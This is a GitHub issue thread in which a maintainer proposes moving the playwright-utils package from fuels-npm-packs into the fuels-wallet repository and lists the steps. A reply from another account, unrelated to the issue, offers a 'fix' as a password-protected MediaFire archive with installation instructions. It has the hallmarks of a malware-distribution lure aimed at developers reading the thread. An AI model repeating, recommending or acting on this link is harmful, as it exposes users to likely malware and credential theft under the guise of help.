### ISSUE TITLE
MIgrate playwright-utils from fuels-npm-packs to the fuels-wallet

### ISSUE THREAD

**Issue by LuizAsFight** [FuelLabs/fuels-wallet#1446]
moving playwright-utils package to fuels-wallet repo as it is better suited inside it, the same repo that it aims to test. It will be easier to debug and keep up with the wallet changes.

- remove from fuels-npm-packs
- add on fuels-wallet
  - re-add publish to npm

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
